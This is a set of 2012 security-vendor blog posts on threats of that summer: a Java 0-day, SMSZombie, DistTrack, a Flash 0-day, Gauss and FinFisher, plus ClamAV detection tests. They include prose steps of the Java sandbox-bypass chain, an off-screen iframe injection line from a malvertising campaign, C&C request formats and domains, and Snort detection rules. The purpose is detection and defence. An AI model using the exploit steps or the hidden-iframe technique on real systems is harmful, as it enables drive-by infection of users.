Tuesday, August 28, 2012

CVE-2012-4681: bypassing built-in java security


A new Java 0-day is running rampant around the internet this week. With a code paste Sunday night and a Metasploit module coming in early yesterday morning, along with myriad research and blog posts, this Java vuln is sure to be the topic of the week. Based on information in the pastie link and the usage of the Gondzz and Gondvv class files in the alienvault blog post, plus analysis we've done on the samples we've seen in the wild, we've deduced that the exploit runs as follows:

-Use the Statement() method to set up a new SecurityManager.
-Create an object with the following attributes:
    a. Permissions object with AllPermissions() set.
    b. A ProtectionDomain for the url, using local file "file:///"
    c. Set up an AccessControlContext for that ProtectionDomain
-Call to the user defined function SetField with string "acc", passing along localStatement to complete the object.
-Inside that function we set an Expression with getField and use the variables passed in. Additionally we make a call to another user defined function, GetClass.
-In GetClass we finish setting up the object with a last Expression passed in with string forName (for acc, an AccessControlContext field) in the class sun.awt.SunToolkit. What this does is replaces the default value for the AccessControlContext object with the one for acc.
-Once the function has returned we run .execute() on the Expression objects.
-At the top level we execute the now fully populated Statement and presumably have full local execution access.



In each case of Statement or Expression, there is a call to var.execute() which takes the statement that has been created as a string and executes it as code. There are two specific access violations that occur during the execution of the code:
-Accessing the "acc" field using Class.forName.
-Using getField on sun.awt.SunToolit, a restricted package.

By using Statement and Expression methods to make these calls, they bypass access violation checks. Once the code has created a file with admin rights on the system, it can call calc.exe like in the POC or download a trojan like the exploit in the wild does.

The scariest part about all of this is that the next scheduled Oracle patch release is October 16. As Oracle has a policy of not issuing out-of-band updates, this means nearly two months of time where attackers can exploit this without root mitigation by the vendor. In the interim, security researcher Michael Schierl has released an unofficial patch, which is for now only available by request.

In the interim, we've released SIDs  24020 to 24028 and 24036 to 24038 to cover this in Snort, and JAVA.Exploit.Agent JAVA.Exploit.Agent-1JAVA.Exploit.Agent-2 WIN.Trojan.Agent-131 on the ClamAV side. We'd urge you to add these to your setup as soon as possible (especially since the authors of the Blackhole exploit kit are incorporating this vulnerability already), and to consider disabling Java in whatever browsers you can.

[Ed.: Oracle released a patch to address this issue on August 30. While done without much explanation or fanfare, well-done to the security folks at Oracle for getting on top of this issue so quickly.]

Tuesday, August 21, 2012

SMSZombie: A New Twist on C&C

One of the most virulent pieces of Android malware to date was recently discovered by TrustGo Labs. Dubbed SMSZombie, this malicious application has infected some 500,000 users throughout China, after having been distributed through the GFan mobile application marketplace.

In some ways, the malware is not particularly novel, as it uses photographs of scantily clad ladies to lure in unsuspecting users, a trend we've observed across many distinct types of Android malware:


What's surprising about it is the fact that its command and control traffic is sent entirely over SMS, instead of the more traditional HTTP or other TCP-based packet. This behavior can be observed very rapidly after installing the application (which kindly returns you to the installer screen if you hit cancel instead of install, making it exceptionally obnoxious to remove); the following two messages were sent when we ran it in our lab:

Number: 13093632006
Message: 1.5V:ModelGT-I9000;os2.1-update1;Languageen;NET3G

Number: 13093632006
Message: The program runs again


Interestingly enough, while examining the APK files for keys to detection, we noticed some odd artifacts left by the authors, including an apparent Chinese name of "baoxian zhushou". While that name alone is insufficient for detection - it pulls up legitimate apps in the Google Play store - combined with the name of one of the JPEG files included in the package, it makes for a solid way to find all variants we've observed of this malware.

Since IDS analysts of any stripe are unable to detect SMS messages being sent, we urge mobile providers to watch for these numbers and other related activity as best they can. We're providing Snort SID 23954 to look for patterns we've detected within the malicious APKs themselves, in case it can be blocked at the HTTP level during a download (depending upon the particular environment being protected).

In the meantime, concerned users should be examining their Android antivirus solution for protection. While TrustGo claims that theirs is the only antivirius solution capable of detection, ClamAV detects this malicious app as Andr.Trojan.SMSZombie, and the recently released FireAMP mobile client will detect it as well.

Stay safe out there!

Thursday, August 16, 2012

New Threat: DistTrack

 Sourcefire is aware of at least one ongoing incident in the energy vertical involving a threat named "DistTrack".  This is a new, destructive threat that has not perviously been seen in the wild.  At this time, the earliest known sightings were on 8/14.  Preliminary indications are that this malware is currently targetted in nature as no wide-spread activity has been detected.

This threat involves several files that perform different functions.  The core of the malware set is a 32-bit executable named trksvr.exe and is internally identified as "Distributed Link Tracking Server".  This file purports to be from Microsoft Corporation with a version number of 5.2.3790.0.  This file is responsible for dropping additional files involved in the malware set.  In some cases this file has been reported as str.exe.

The trkssvr.exe file drops three files: a reporter executable, a data destruction executable and 64-bit executable, also named tsksvr.exe that runs as a service.  The reporter executable is responsible for communicating with a C&C server.  An interesting part of this executable is that its hard-coded with the C&C address in the .rdata block, as well as a URL for communicating.  The URL in .rdata is /ajax_modal/modal/data.asp and the construct for reporting is http://%s%s?%s=%s&%s=%s&state=%d (you'll see the parameter names mydata and uid as separate unicode strings in .rdata as well).  While communicating with the C&C server, it uses "you" as the user-agent string.  The request appears on the wire as:

GET /ajax_modal/modal/data.asp?mydata=AA==&uid=aaa.bbb.ccc.ddd&state=3067203 HTTP/1.0
User-Agent: you


The danger from this malware comes from the data destruction component.  In short, this application does not pull any punches.  Four hours after infection, it overwrites data files with a portion of a jpeg file, targetting files in "Documents and Settings", "Users", "Windows\System32\Drivers and "Windows\System32\Config".  Once this is done the file overwrites the MBR of the machine, rendering it unable to boot.  Any analysis of this malware should occur only on virtual machines or on computers you are ready to completely rebuild.

Analysis of this threat and its behavior in the wild are ongoing.  Detection for these threats is already in place for FireAMP, Snort and ClamAV.  In IPS mode, Snort will prevent contact with the command and control server and identify infected hosts.  Protection is provided by ClamAV and FireAMP.  Additionally, FireAMP's Threat Root Cause and quarantining capability will provide additional incident response and mitigation capability.  Here is a list of currently available detection:

FireAMP : W32.Distrack.AP
ClamAV : Win.Trojan.DistTrack
ClamAV : Win.Trojan.DistTrack-1
Snort: BOTNET-CNC Win.Trojan.DistTrack command and control traffic (23893)
Snort: BLACKLIST User-Agent known malicious user agent - you", (23903)

Additional detection will be released as analysis and research generate further actionable data.

You know, it isn't often that we can say something is targeted and also talk about a widely distributed, devastating payload like this one.  While all the facts aren't yet available, someone somewhere made a very interesting decision.

CVE-2012-1535: Flash 0-day In The Wild

Yesterday Adobe released APSB12-18, which addressed CVE-2012-1535. As noted in the Adobe bulletin, the vulnerability has been actively exploited in the wild, though primarily in targeted attacks wrapped in Microsoft Word documents.

The VRT was able to obtain a sample of one of the documents that has been circulating in the wild, and has created several new rules that detect it. While the vulnerability itself is complex - as are most Flash issues - there are several extremely obvious indicators of malicious intent in the file, including plaintext strings and several unencoded, unobfuscated characters commonly associated with heap spray techniques. Given that even compressing the Flash - which is trivial to do, and commonly found in the field - would have obscured these indicators, we're a bit puzzled as to why the actors behind these attacks chose not to do so, particularly since sending such an obviously malicious file presented them with the risk of having their 0-day attack discovered.

We've released several new rules today to detect this attack. SIDs 23853 and 23854 look for the underlying vulnerability, and 23856 and 23857 will detect the specific Flash files used in the document mentioned above. SIDs 23857 - 23862 look for different variants of the heap spray bytes used in this attack, that are common in other attacks in the field.

It's also worth noting that SIDs 18546 or 18549 (depending on the delivery mechanism - HTTP vs. SMTP, respectively), which look for Flash files embedded in Word documents, would have caught this attack prior to discovery by any party. While there are occasional legitimate uses for such documents, you may wish to consider enabling those rules in your particular environment - especially if you're willing to trade 0-day detection for the occasional false positive.

Friday, August 10, 2012

Gauss & FinFisher: The latest targeted malware everyone cares about.

This week has been a busy one for high-profile malware. A pair of new types of malware - Gauss and FinFisher - have people around the world worried, and media churning out concerned articles as fast as they can be written. Fortunately, the VRT has you covered, so you can spend the weekend relaxing instead of trying to ensure that you're safe from these threats.

Gauss is a recently discovered malware platform specifically designed to collect and steal credentials from targeted users for various email and instant messaging accounts, social networks, and banking systems. Gauss is "modular malware."  It contains various modules and ActiveX controls to do its bidding and its payload is fully encrypted.  Based on the data released by Kaspersky Labs, the vast majority of Gauss infections have been found in Lebanon, Israel, and Palestine. This surprisingly small geographic region indicates it's likely a targeted attack.

Behavioral analysis reveals the malicious command and control domains for Gauss:
[a-c].guest-access.net
[a-c].dotnetadvisor.info
[a-c].bestcomputeradvisor.com
[a-c].datajunction.org
[a-c].secuurity.net
[a-c].gowin7.com

Snort SIDs 23799 through 23804 cover attempts to contact these known malicious C&C servers. Additionally, SID 23824 covers the HTTP request made after resolving the C&C, which is unique enough to ensure a minimal to nonexistent false positive rate. As these rules have yet to be released, we're providing them here so that you can load them over the weekend if your organization is concerned:

alert udp $HOME_NET any -> any 53 (msg:"BLACKLIST DNS request for known malware domain guest-access.net - Gauss"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|0C|guest-access|03|net|00|"; fast_pattern:only; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service dns; reference:url,gauss.crysys.hu/; reference:url,www.securelist.com/en/blog/208193767/Gauss_Nation_state_cyber_surveillance_meets_banking_Trojan; classtype:trojan-activity; sid:23799; rev:1;)
alert udp $HOME_NET any -> any 53 (msg:"BLACKLIST DNS request for known malware domain dotnetadvisor.info - Gauss"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|0D|dotnetadvisor|04|info|00|"; fast_pattern:only; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service dns; reference:url,gauss.crysys.hu/; reference:url,www.securelist.com/en/blog/208193767/Gauss_Nation_state_cyber_surveillance_meets_banking_Trojan; classtype:trojan-activity; sid:23800; rev:1;)
alert udp $HOME_NET any -> any 53 (msg:"BLACKLIST DNS request for known malware domain bestcomputeradvisor.com - Gauss"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|13|bestcomputeradvisor|03|com|00|"; fast_pattern:only; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service dns; reference:url,gauss.crysys.hu/; reference:url,www.securelist.com/en/blog/208193767/Gauss_Nation_state_cyber_surveillance_meets_banking_Trojan; classtype:trojan-activity; sid:23801; rev:1;)
alert udp $HOME_NET any -> any 53 (msg:"BLACKLIST DNS request for known malware domain datajunction.org - Gauss"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|0C|datajunction|03|org|00|"; fast_pattern:only; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service dns; reference:url,gauss.crysys.hu/; reference:url,www.securelist.com/en/blog/208193767/Gauss_Nation_state_cyber_surveillance_meets_banking_Trojan; classtype:trojan-activity; sid:23802; rev:1;)
alert udp $HOME_NET any -> any 53 (msg:"BLACKLIST DNS request for known malware domain secuurity.net - Gauss"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|09|secuurity|03|net|00|"; fast_pattern:only; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service dns; reference:url,gauss.crysys.hu/; reference:url,www.securelist.com/en/blog/208193767/Gauss_Nation_state_cyber_surveillance_meets_banking_Trojan; classtype:trojan-activity; sid:23803; rev:1;)
alert udp $HOME_NET any -> any 53 (msg:"BLACKLIST DNS request for known malware domain gowin7.com - Gauss"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|06|gowin7|03|com|00|"; fast_pattern:only; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service dns; reference:url,gauss.crysys.hu/; reference:url,www.securelist.com/en/blog/208193767/Gauss_Nation_state_cyber_surveillance_meets_banking_Trojan; classtype:trojan-activity; sid:23804; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BOTNET-CNC Gauss malware check-in"; flow:to_server,established; content:"/userhome.php?sid="; nocase; http_uri; content:"&uid="; distance:0; nocase; http_uri; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service http; reference:url,gauss.crysys.hu/; reference:url,www.securelist.com/en/blog/208193767/Gauss_Nation_state_cyber_surveillance_meets_banking_Trojan; classtype:trojan-activity; sid:23824; rev:1;)

Detecting Gauss locally is arguably harder. Of the two sample DLLs the VRT has come across, both used the following decryption routine:


Detecting the above decryption subroutine provides reliable local detection for the samples we have encountered and should cover other variants. ClamAV signatures W32.Trojan.Gauss-1 through W32.Trojan.Gauss-15 are what you need to ensure are enabled for AV coverage.

FinFisher, a piece of lawful intercept malware first discussed by Rapid7, uses a heavily encoded protocol for communicating with its C&C servers. While analysts are still working on cracking that data, it has an easily detectable signature of either 8 or 16 static bytes at the start of its packet types, which makes for a pair of trivial Snort signatures:

alert tcp $HOME_NET any -> $EXTERNAL_NET [22,53,80,443] (msg:"BOTNET-CNC FinFisher initial outbound connection attempt"; flow:to_server,established; content:"|0C 00 00 00 40 01 73 00|"; fast_pattern:only; metadata:impact_flag red; reference:url,community.rapid7.com/community/infosec/blog/2012/08/08/finfisher; classtype:trojan-activity; sid:23825; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET [22,53,80,443] (msg:"BOTNET-CNC FinFisher outbound connection attempt"; flow:to_server,established; content:"|5C 00 00 00 A0 02 72 00 0C 00 00 00 40 04 FE 00|"; fast_pattern:only; metadata:impact_flag red; reference:url,community.rapid7.com/community/infosec/blog/2012/08/08/finfisher; classtype:trojan-activity; sid:23826; rev:1;)
ClamAV coverage is equally trivial, as the malware contains a batch file in clear text that is used to remove the initial binaries dropped on the system. If you've got Trojan.FinFisher enabled, you're golden.

Tuesday, August 7, 2012

Stupid CSS Tricks

As has been well-demonstrated by the Blackhole Exploit Kit's "Loading, Please Wait..." page, people browsing the web are most likely to allow a malicious page to complete whatever action it is attempting to execute when they see no signs of strange activity on that page. Malware authors have taken note of this over the years, and go to great lengths to hide, obscure, or otherwise make invisible any part of a page that might look out of place to even the most casual of observers.

One of the classic techniques for doing so is to make use of hidden HTML iframe tags. As with anything HTML-based, there are an essentially infinite number of ways that the same effect can be achieved; height and width values can be set directly as attributes of the tag, or CSS style properties can be tweaked either inline in the tag itself, or as part of a piece of associated JavaScript.

The VRT has observed a recent malvertising campaign in the wild that puts a new spin on this old idea. Instead of specifiying size values so small that the iframe never renders, the technique being used here abuses the CSS positioning attributes, by specifying absolute values of -1,000 for both the "left" and "top" parameters. As the iframe is declared to be 6x10 pixels in size, the browser considers it to be so far off the edge of the screen that it never even attempts to render it for the user:

document.write("<iframe height="10" src="http://<redacted>.org/route.htm" style="left: -1000px; position: absolute; top: -1000px; z-index: 1;" width="6" ></iframe>");

Fortunately, this particular variant makes for an easy signature, as no legitimate iframes will ever be placed in such a ludicrous spot on the page; SID 23618 will do the job nicely. In the meantime, the VRT is continuing to follow new developments in iframe obfuscation, with an eye towards generically detecting malicious hidden iframes. As always, if you see something malicious on your network that we're not currently providing coverage for, please send us a sample at vrt at sourcefire dot com, so that our detection can be improved for you and for the entire Snort user base.

Monday, August 6, 2012

ClamAV vs. Content IQ Test, part 4

This is the fourth in a series of five blog posts about the Content IQ Test. Please see ClamAV vs. Content IQ Test, part 1, ClamAV vs. Content IQ Test, part 2 and ClamAV vs. Content IQ Test, part 3.

How would ClamAV do against dangerous VBA (Visual Basic for Applications) embedded in Office documents?

Test file 22 has the target string contained in VBA embedded in a Powerpoint file.

azidouemba@ubuntu:~/Downloads$ cat test.ldb 
TestSig2;Target:0;(0|1);6576616c{-200}756e657363617065{-200}282725363525373625363925366325323825323927;6500760061006c{-200}75006e006500730063006100700065{-200}2800270025003600350025003700360025003600390025003600630025003200380025003200390027
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_22_Ts_in_Vba_in_Ppt.pptm 
Test_File_22_Ts_in_Vba_in_Ppt.pptm: TestSig2.UNOFFICIAL FOUND

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.30 MB
Data read: 0.32 MB (ratio 0.96:1)
Time: 0.449 sec (0 m 0 s)

azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_22_Negative_Control.pptm
Test_File_22_Negative_Control.pptm: OK

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.68 MB
Data read: 0.31 MB (ratio 2.16:1)
Time: 0.069 sec (0 m 0 s)

A PPTM file is a macro-enabled Powerpoint Presentation file and follows the Microsoft Office OpenXML format, which combines XML and ZIP compression. ClamAV treats PPTM files as archives and has no problem seeing the following in one of the files within that archive:

[snip]
00000600  01 00 00 20 00 1c 02 b6  00 2d 00 65 76 61 6c 28  |... .....-.eval(|
00000610  75 6e 65 73 63 61 70 65  28 27 25 36 35 25 37 36  |unescape('%65%76|
00000620  25 36 39 25 36 63 25 32  38 25 32 39 27 29 29 20  |%69%6c%28%29')) |
00000630  3d 20 65 76 69 6c 28 29  00 11 00 20 00 1e 02 11  |= evil()... ....|
[/snip]

Test files 23, 24 and 25 are respectively Word, Excel and Powerpoint Show files that have the target string contained in an embedded VBA script. Simarly to test file 22, ClamAV treats these DOCM, XLSM and PPSM files as archives. See below:


azidouemba@ubuntu:~/Downloads$ cat test.ldb 
TestSig2;Target:0;(0|1);6576616c{-200}756e657363617065{-200}282725363525373625363925366325323825323927;6500760061006c{-200}75006e006500730063006100700065{-200}2800270025003600350025003700360025003600390025003600630025003200380025003200390027
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_23_Ts_in_Vba_in_Doc.docm 
Test_File_23_Ts_in_Vba_in_Doc.docm: TestSig2.UNOFFICIAL FOUND

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.00 MB
Data read: 0.34 MB (ratio 0.00:1)
Time: 0.013 sec (0 m 0 s)
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_23_Negative_Control.docm 
Test_File_23_Negative_Control.docm: OK

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.72 MB
Data read: 0.34 MB (ratio 2.14:1)
Time: 0.086 sec (0 m 0 s)
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_24_Ts_in_Vba_in_Xls.xlsm 
Test_File_24_Ts_in_Vba_in_Xls.xlsm: TestSig2.UNOFFICIAL FOUND

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.04 MB
Data read: 0.29 MB (ratio 0.14:1)
Time: 0.017 sec (0 m 0 s)
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_24_Negative_Control.xlsm 
Test_File_24_Negative_Control.xlsm: OK

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.59 MB
Data read: 0.29 MB (ratio 2.01:1)
Time: 0.159 sec (0 m 0 s)
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_25_Ts_in_Vba_in_Pps.ppsm 
Test_File_25_Ts_in_Vba_in_Pps.ppsm: TestSig2.UNOFFICIAL FOUND

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.30 MB
Data read: 0.32 MB (ratio 0.96:1)
Time: 0.051 sec (0 m 0 s)
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_25_Negative_Control.ppsm 
Test_File_25_Negative_Control.ppsm: OK

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.68 MB
Data read: 0.31 MB (ratio 2.16:1)
Time: 0.063 sec (0 m 0 s)


Test file 26 is a file that has the target string contained in an executable file embedded in a PDF file.


azidouemba@ubuntu:~/Downloads$ cat test.ldb 
TestSig2;Target:0;(0|1);6576616c{-200}756e657363617065{-200}282725363525373625363925366325323825323927;6500760061006c{-200}75006e006500730063006100700065{-200}2800270025003600350025003700360025003600390025003600630025003200380025003200390027
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_26_Ts_in_Exe_in_Pdf.pdf 
Test_File_26_Ts_in_Exe_in_Pdf.pdf: TestSig2.UNOFFICIAL FOUND

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.02 MB
Data read: 0.01 MB (ratio 2.00:1)
Time: 0.011 sec (0 m 0 s)
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_26_Negative_Control.pdf 
Test_File_26_Negative_Control.pdf: OK

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.02 MB
Data read: 0.01 MB (ratio 3.00:1)
Time: 0.011 sec (0 m 0 s)


ClamAV was able to determine that an executable was embedded in the PDF file, extracted it and found the following in it:

[snip]
000025e0  6e 00 67 00 73 00 21 00  0a 00 0a 00 00 4d 65 00  |n.g.s.!......Me.|
000025f0  76 00 61 00 6c 00 28 00  75 00 6e 00 65 00 73 00  |v.a.l.(.u.n.e.s.|
00002600  63 00 61 00 70 00 65 00  28 00 27 00 25 00 36 00  |c.a.p.e.(.'.%.6.|
00002610  35 00 25 00 37 00 36 00  25 00 36 00 39 00 25 00  |5.%.7.6.%.6.9.%.|
00002620  36 00 63 00 25 00 32 00  38 00 25 00 32 00 39 00  |6.c.%.2.8.%.2.9.|
00002630  27 00 29 00 29 00 0a 00  0a 00 01 5f 49 00 66 00  |'.).)......_I.f.|
00002640  20 00 74 00 68 00 69 00  73 00 20 00 68 00 61 00  | .t.h.i.s. .h.a.|
[/snip]

Test file 27 consists of the target string contained in an executable file embedded in a PDF file in a polymorphic Zip file. We can take an educated guess as to whether ClamAV will be able to find the target string in such a file, but let's look at the test results:
azidouemba@ubuntu:~/Downloads$ cat test.ldb 
TestSig2;Target:0;(0|1);6576616c{-200}756e657363617065{-200}282725363525373625363925366325323825323927;6500760061006c{-200}75006e006500730063006100700065{-200}2800270025003600350025003700360025003600390025003600630025003200380025003200390027
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_27_Ts_in_Exe_in_Pdf_in_Zip.zip 
Test_File_27_Ts_in_Exe_in_Pdf_in_Zip.zip: TestSig2.UNOFFICIAL FOUND

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.02 MB
Data read: 0.02 MB (ratio 1.00:1)
Time: 0.063 sec (0 m 0 s)
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_27_Negative_Control.zip 
Test_File_27_Negative_Control.zip: OK

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.05 MB
Data read: 0.01 MB (ratio 4.00:1)
Time: 0.016 sec (0 m 0 s)

Finding the target string in test file 27 is no harder for ClamAV than it is for us to open Russian dolls. ClamAV extracted the contents of the Zip archive, found and opened the PDF file. The PDF was analyzed and found to contain an executable that was extracted. In the executable, ClamAV came across the following string which caused it to alert:


[snip]
000025e0  6e 00 67 00 73 00 21 00  0a 00 0a 00 00 4d 65 00  |n.g.s.!......Me.|
000025f0  76 00 61 00 6c 00 28 00  75 00 6e 00 65 00 73 00  |v.a.l.(.u.n.e.s.|
00002600  63 00 61 00 70 00 65 00  28 00 27 00 25 00 36 00  |c.a.p.e.(.'.%.6.|
00002610  35 00 25 00 37 00 36 00  25 00 36 00 39 00 25 00  |5.%.7.6.%.6.9.%.|
00002620  36 00 63 00 25 00 32 00  38 00 25 00 32 00 39 00  |6.c.%.2.8.%.2.9.|
00002630  27 00 29 00 29 00 0a 00  0a 00 01 5f 49 00 66 00  |'.).)......_I.f.|
00002640  20 00 74 00 68 00 69 00  73 00 20 00 68 00 61 00  | .t.h.i.s. .h.a.|
[/snip]

The next post in this series will examine how well ClamAV does against the Malicious Content IQ Test.